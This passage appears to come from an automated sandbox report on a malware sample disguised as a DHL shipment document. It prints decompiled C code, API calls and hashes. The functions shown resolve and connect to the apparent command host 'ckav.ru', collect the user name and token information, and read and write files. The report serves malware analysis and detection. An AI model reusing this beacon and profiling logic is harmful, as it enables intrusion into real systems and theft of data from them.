				}
				L2:
				return 0;
			}


























                    0x004061c3
                    0x004061cb
                    0x004061cd
                    0x004061d0
                    0x004061de
                    0x004061e0
                    0x004061e5
                    0x004061e9
                    0x004061eb
                    0x004061ed
                    0x004061f2
                    0x0040622a
                    0x00406230
                    0x00406235
                    0x00406239
                    0x0040623b
                    0x00406244
                    0x00406249
                    0x00406249
                    0x0040624c
                    0x00406253
                    0x00406256
                    0x00406258
                    0x00406261
                    0x00406266
                    0x00406266
                    0x00406270
                    0x00406273
                    0x00406276
                    0x0040627b
                    0x0040627e
                    0x0040628c
                    0x0040628e
                    0x00406290
                    0x00406295
                    0x0040629a
                    0x0040629e
                    0x004062a0
                    0x004062ac
                    0x004062af
                    0x004062b7
                    0x004062b9
                    0x004062c9
                    0x004062e0
                    0x004062e2
                    0x004062e4
                    0x004062f3
                    0x004062f3
                    0x004062e4
                    0x004062f8
                    0x004062fd
                    0x004062a0
                    0x004062fe
                    0x00406302
                    0x00406307
                    0x0040630c
                    0x0040630d
                    0x0040630f
                    0x00406312
                    0x00406317
                    0x00406318
                    0x0040631c
                    0x0040631e
                    0x00406321
                    0x00406326
                    0x00000000
                    0x00406327
                    0x004061f4
                    0x004061ff
                    0x00406208
                    0x00406218
                    0x0040621d
                    0x00406224
                    0x00406226
                    0x00406228
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406228
                    0x00406201
                    0x00000000

                    APIs
                    • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                    • _wmemset.LIBCMT ref: 00406244
                    • _wmemset.LIBCMT ref: 00406261
                    • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wmemset$ErrorInformationLastToken
                    • String ID: IDA$IDA
                    • API String ID: 487585393-2020647798
                    • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                    • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                    • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                    • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 552 404ec7-404ec9 542->552 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 549 404ec0-404ec6 call 402bab 545->549 550 404ecb 545->550 546->545 549->552 551 404ecd-404ece 550->551 551->539 552->551
                    C-Code - Quality: 37%
                    			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

















                    0x00404e1d
                    0x00404e26
                    0x00404e2a
                    0x00404e2f
                    0x00404e37
                    0x00404e3a
                    0x00404e45
                    0x00404e4f
                    0x00404e57
                    0x00404e61
                    0x00404e66
                    0x00404e68
                    0x00404e6c
                    0x00404e6e
                    0x00404e7a
                    0x00404e80
                    0x00404e84
                    0x00404e9f
                    0x00404ea7
                    0x00404eab
                    0x00404eb1
                    0x00404eb1
                    0x00404eb6
                    0x00404ebe
                    0x00404ecb
                    0x00000000
                    0x00404ec0
                    0x00404ec1
                    0x00404ec7
                    0x00404ec7
                    0x00404ecd
                    0x00000000
                    0x00404ece
                    0x00404ebe
                    0x00404e87
                    0x00404e90
                    0x00000000
                    0x00404e90
                    0x00000000

                    APIs
                    • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                    • socket.WS2_32(?,?,?), ref: 00404E7A
                    • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: freeaddrinfogetaddrinfosocket
                    • String ID:
                    • API String ID: 2479546573-0
                    • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                    • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                    • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                    • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 570 404113-404119 559->570 571 40417a 559->571 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 569 4041a9-4041b8 call 403c59 562->569 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 569->576 577 4041db-4041e4 call 402bab 569->577 570->571 575 40411b-404120 570->575 574 40417d-40417e call 403c40 571->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->571 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                    C-Code - Quality: 74%
                    			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}



















                    0x004040c4
                    0x004040ce
                    0x004040d0
                    0x004040e8
                    0x004040ea
                    0x004040ec
                    0x004040f2
                    0x0040418d
                    0x00404190
                    0x00404184
                    0x00000000
                    0x00404184
                    0x004041a0
                    0x004041a5
                    0x004041a7
                    0x00000000
                    0x00000000
                    0x004041a9
                    0x004041b6
                    0x004041b8
                    0x004041be
                    0x004041cb
                    0x004041d0
                    0x004041d1
                    0x004041d3
                    0x004041d8
                    0x004041dc
                    0x00000000
                    0x004041e2
                    0x00404100
                    0x0040410c
                    0x00404111
                    0x0040417a
                    0x0040417a
                    0x00000000
                    0x0040411b
                    0x0040411b
                    0x00404120
                    0x00404122
                    0x00404122
                    0x0040412c
                    0x0040413a
                    0x0040413c
                    0x00404140
                    0x00000000
                    0x00404142
                    0x0040414a
                    0x00404155
                    0x0040415a
                    0x0040415e
                    0x00404168
                    0x00404174
                    0x00404176
                    0x00404176
                    0x0040417d
                    0x0040417e
                    0x00000000
                    0x00404183
                    0x00404140

                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AllocCreateReadVirtual
                    • String ID: .tmp
                    • API String ID: 3585551309-2986845003
                    • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                    • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                    • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                    • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 79%
                    			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}































































                    0x0041386f
                    0x0041387e
                    0x00413885
                    0x00413889
                    0x0041388c
                    0x00413890
                    0x00413893
                    0x00413897
                    0x0041389a
                    0x0041389e
                    0x004138a1
                    0x004138a5
                    0x004138a8
                    0x004138ac
                    0x004138af
                    0x004138b2
                    0x004138b5
                    0x004138b8
                    0x004138bb
                    0x004138bc
                    0x004138c4
                    0x004138c8
                    0x004138cb
                    0x004138cf
                    0x004138d2
                    0x004138d6
                    0x004138d7
                    0x004138df
                    0x004138e3
                    0x004138e4
                    0x004138ea
                    0x004138eb
                    0x004138f1
                    0x004138f5
                    0x004138f9
                    0x004138fd
                    0x00413901
                    0x00413905
                    0x00413909
                    0x0041390d
                    0x00413911
                    0x00413915
                    0x00413919
                    0x0041391d
                    0x00413921
                    0x00413925
                    0x00413929
                    0x0041392d
                    0x00413931
                    0x00413935
                    0x00413939
                    0x0041393d
                    0x00413941
                    0x00413950
                    0x00413959
                    0x0041395f
                    0x00413968
                    0x0041396e
                    0x00413973
                    0x00413977
                    0x00413979
                    0x00413980
                    0x00413982
                    0x00413991
                    0x0041399c
                    0x0041399e
                    0x004139a4
                    0x004139a9
                    0x004139ac
                    0x004139b1
                    0x004139b1
                    0x004139b2
                    0x004139b7
                    0x004139bc
                    0x004139c1
                    0x004139c7
                    0x004139cd
                    0x004139cd
                    0x004139db

                    APIs
                    • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                    • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                    • GetLastError.KERNEL32 ref: 0041399E
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: Error$CreateLastModeMutex
                    • String ID:
                    • API String ID: 3448925889-0
                    • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                    • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                    • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                    • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}








                    0x004042cf
                    0x004042d5
                    0x004042df
                    0x004042e2
                    0x004042f9
                    0x004042fb
                    0x00404300
                    0x0040430a
                    0x00404314
                    0x00404319
                    0x00404323
                    0x00404334
                    0x0040433b
                    0x0040433b
                    0x0040433f
                    0x00404344
                    0x0040434c

                    APIs
                    • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                    • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CreatePointerWrite
                    • String ID:
                    • API String ID: 3672724799-0
                    • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                    • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                    • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                    • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                    Download Yara Rule
                    C-Code - Quality: 34%
                    			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}






























                    0x00412d31
                    0x00412d34
                    0x00412d39
                    0x00412d3c
                    0x00412d49
                    0x00412d50
                    0x00412d52
                    0x00412f24
                    0x00412f24
                    0x00412f2b
                    0x00412f30
                    0x00412f32
                    0x00412f37
                    0x00412f41
                    0x00412f53
                    0x00412f53
                    0x00412f5b
                    0x00412f60
                    0x00412d58
                    0x00412d58
                    0x00412d63
                    0x00412d6c
                    0x00412d73
                    0x00412d7e
                    0x00412d7f
                    0x00412d80
                    0x00412d81
                    0x00412d82
                    0x00412d8f
                    0x00412da1
                    0x00412da6
                    0x00412dae
                    0x00412db0
                    0x00412db1
                    0x00412db5
                    0x00412dce
                    0x00412dcf
                    0x00412dd5
                    0x00412dda
                    0x00412db7
                    0x00412db7
                    0x00412db8
                    0x00412dbe
                    0x00412dc4
                    0x00412dc9
                    0x00412dc9
                    0x00412de2
                    0x00412de4
                    0x00412de5
                    0x00412de7
                    0x00412de9
                    0x00412e02
                    0x00412e03
                    0x00412e09
                    0x00412e0e
                    0x00412deb
                    0x00412deb
                    0x00412dec
                    0x00412df2
                    0x00412df8
                    0x00412dfd
                    0x00412dfd
                    0x00412e11
                    0x00412e17
                    0x00412e19
                    0x00412e1a
                    0x00412e1e
                    0x00412e37
                    0x00412e38
                    0x00412e3e
                    0x00412e43
                    0x00412e20
                    0x00412e20
                    0x00412e21
                    0x00412e27
                    0x00412e2d
                    0x00412e32
                    0x00412e32
                    0x00412e4b
                    0x00412e4d
                    0x00412e4f
                    0x00412e7e
                    0x00412e8a
                    0x00412e8f
                    0x00412e51
                    0x00412e59
                    0x00412e67
                    0x00412e6d
                    0x00412e72
                    0x00412e72
                    0x00412e9e
                    0x00412eaf
                    0x00412eb4
                    0x00412ec0
                    0x00412ece
                    0x00412edc
                    0x00412eea
                    0x00412ef8
                    0x00412f0f
                    0x00412f14
                    0x00412f14
                    0x00412f17
                    0x00412f1d
                    0x00412f1f
                    0x00000000
                    0x00412f1f
                    0x00412f74

                    APIs
                    • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                      • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                      • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                      • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$CreateFreeProcessThread_wmemset
                    • String ID: ckav.ru
                    • API String ID: 2915393847-2696028687
                    • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                    • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                    • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                    • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}







                    0x00406340
                    0x00406345
                    0x00406373
                    0x00406373
                    0x00406347
                    0x0040634f
                    0x00406354
                    0x00406357
                    0x0040635c
                    0x00406366
                    0x0040636d
                    0x00000000
                    0x00406368
                    0x00406368
                    0x00406368
                    0x00406366
                    0x0040637a

                    APIs
                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    • _wmemset.LIBCMT ref: 0040634F
                      • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateNameProcessUser_wmemset
                    • String ID: CA
                    • API String ID: 2078537776-1052703068
                    • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                    • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                    • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
